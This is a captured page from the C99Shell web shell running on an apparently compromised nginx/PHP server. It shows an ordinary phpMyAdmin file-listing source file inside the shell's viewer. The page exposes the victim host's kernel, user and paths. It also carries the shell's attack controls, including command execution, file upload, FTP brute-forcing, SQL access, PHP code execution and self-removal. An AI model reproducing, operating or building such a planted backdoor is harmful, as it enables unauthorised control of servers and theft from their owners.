!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpMY/libraries/   drwxrwxr-x
Free 83.33 GB of 96.73 GB (86.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     file_listing.php (2.55 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Functions for listing directories
 *
 * @todo rename to file_listing.lib.php
 * @package PhpMyAdmin
 */

/**
 * Returns array of filtered file names
 *
 * @param string $dir        directory to list
 * @param string $expression regular expression to match files
 * @return array   sorted file list on success, false on failure
 */
function PMA_getDirContent($dir$expression '')
{
    if (
file_exists($dir) && $handle = @opendir($dir)) {
        
$result = array();
        if (
substr($dir, -1) != '/') {
            
$dir .= '/';
        }
        while (
$file = @readdir($handle)) {
        
// for PHP < 5.2.4, is_file() gives a warning when using open_basedir
        // and verifying '..' or '.'
            
if ('.' != $file && '..' != $file && is_file($dir $file) && ($expression == '' || preg_match($expression$file))) {
                
$result[] = $file;
            }
        }
        @
closedir($handle);
        
asort($result);
        return 
$result;
    } else {
        return 
false;
    }
}

/**
 * Returns options of filtered file names
 *
 * @param string $dir        directory to list
 * @param string $extensions regullar expression to match files
 * @param string $active     currently active choice
 * @return array   sorted file list on success, false on failure
 */
function PMA_getFileSelectOptions($dir$extensions ''$active '')
{
    
$list PMA_getDirContent($dir$extensions);
    if (
$list === false) {
        return 
false;
    }
    
$result '';
    foreach (
$list as $key => $val) {
        
$result .= '<option value="'htmlspecialchars($val) . '"';
        if (
$val == $active) {
            
$result .= ' selected="selected"';
        }
        
$result .= '>' htmlspecialchars($val) . '</option>' "\n";
    }
    return 
$result;
}

/**
 * Get currently supported decompressions.
 *
 * @return string | separated list of extensions usable in PMA_getDirContent
 */
function PMA_supportedDecompressions()
{
    global 
$cfg;

    
$compressions '';

    if (
$cfg['GZipDump'] && @function_exists('gzopen')) {
        if (!empty(
$compressions)) {
            
$compressions .= '|';
        }
        
$compressions .= 'gz';
    }
    if (
$cfg['BZipDump'] && @function_exists('bzopen')) {
        if (!empty(
$compressions)) {
            
$compressions .= '|';
        }
        
$compressions .= 'bz2';
    }
    if (
$cfg['ZipDump'] && @function_exists('gzinflate')) {
        if (!empty(
$compressions)) {
            
$compressions .= '|';
        }
        
$compressions .= 'zip';
    }

    return 
$compressions;
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0045 ]--